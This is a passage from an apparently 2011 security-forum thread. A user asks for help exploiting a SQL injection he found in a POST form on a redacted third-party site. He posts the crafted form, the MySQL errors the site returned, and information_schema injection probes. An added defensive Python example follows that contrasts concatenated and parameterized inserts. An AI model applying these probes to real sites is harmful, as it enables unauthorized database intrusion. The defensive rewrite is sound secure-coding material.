IT Security and Insecurity Portal

Advanced SQL injection [ Help ]

Posted: Mon Jul 04, 2011 3:14 pm
kr0k0
Advanced user
Joined: Jan 26, 2008
Posts: 128

I made this page as it is the same ...

Code:
<html>
<form name="AddNewdForm" id="AddNewdForm" action="http://www.xxx.com/once.php" method="post" enctype="multipart/form-data">
<input type="text" name="etat_civile" value="Mr">
<input type="text" name="Nom_d" id="Nom_d" value="ad">
<input type="text" name="Prenom_d" id="Prenom_d" value="b">
<input type="text" name="Adresse_d" id="Adresse_d" value="c">
<input type="text" name="Commune_d" id="Commune_d" value="xxxxxxxx">
<input type="text" name="Wilaya" id="Wilaya" value="44">
<input type="text" name="Sujet" id="Sujet" value="8">
<input type="text" name="Client_d" value="Oui">
<input type="text" name="Telephone_d" id="Telephone_d" value="04546547">
<input type="text" name="Email_d" id="Email_d" value="dump@hotmail.fr">
<input type="text" name="hiddene_d" id="hiddene_d" cols="55" value="aa">
<input type="submit" name="Submit2" value="Test!">
<input type="text" name="dAction" id="dAction" value="Add">
</form>
</html>

So I found a SQL bug through data input (parameter name) via POST request. Once I try xxxxxxxx" in the parameter name Commune_d I got this error message:

Code:
1064:You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '44","8","Oui","046546467","dump@hotmail.fr","","1309734000","16:14:16","41.201.8' at line 1

So? It's the INSERT INTO command? Right?
Look again here ... When I try this

Code:
0x3e,0x3e) SELECT * from information_schema.tables--
0x3e,0x3e,0x3e) SELECT * from information_schema.tables--
0x3e,0x3e,0x3e,0x3e) SELECT * from information_schema.tables--

I get a normal page .. But here it's different

Code:
0x3e,0x3e,0x3e,0x3e,0x3e) SELECT * from information_schema.tables--

1406:Data too long for column 'Email_D' at row 1
So?
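
Added example, not part of the original post and not the site's own code: the 1064 message quoted above is what an INSERT assembled by string concatenation produces when a value contains a double quote. The sketch puts that pattern beside a bound-parameter version that also checks length server-side and returns a generic error instead of the database message. The table name `demande`, the three-column subset, the 64-character limit and the use of sqlite3 in place of MySQL are assumptions.

```python
import sqlite3

# Assumptions: table name, column subset and length limit are hypothetical;
# sqlite3 stands in for MySQL so the example runs offline.
MAX_EMAIL = 64
server_log = []
# Constructed sample input, using the form values shown in the post.
SAMPLE = {"Commune_d": 'xxxxxxxx"', "Wilaya": "44", "Email_d": "dump@hotmail.fr"}

def open_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE demande (Commune_d TEXT, Wilaya TEXT, Email_d TEXT)")
    return db

def insert_concatenated(db, commune, wilaya, email):
    """'Before': values are pasted between double quotes, so a quote in the
    input ends the literal early and the remainder is parsed as SQL."""
    sql = ('INSERT INTO demande (Commune_d, Wilaya, Email_d) VALUES ("'
           + commune + '","' + wilaya + '","' + email + '")')
    db.execute(sql)

def insert_bound(db, commune, wilaya, email):
    """'After': placeholders keep data out of the statement text, and the
    length is validated before the database ever sees the value."""
    if len(email) > MAX_EMAIL:
        raise ValueError("Email_d too long")
    db.execute(
        "INSERT INTO demande (Commune_d, Wilaya, Email_d) VALUES (?, ?, ?)",
        (commune, wilaya, email),
    )

def handle_post(db, form, insert):
    """Return only a generic status to the client; the database message
    (the 1064/1406 text in the post) goes to the server log instead."""
    try:
        insert(db, form["Commune_d"], form["Wilaya"], form["Email_d"])
        return "ok"
    except (sqlite3.Error, ValueError) as exc:
        server_log.append(repr(exc))
        return "invalid request"

if __name__ == "__main__":
    db = open_db()
    print(handle_post(db, SAMPLE, insert_concatenated))  # statement fails to parse
    print(handle_post(db, SAMPLE, insert_bound))         # quote stored as data
    print(db.execute("SELECT Commune_d FROM demande").fetchall())
```

With bound parameters the trailing quote in `Commune_d` is stored as an ordinary character, and neither parse errors nor column-length errors reach the HTTP response.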
All times are GMT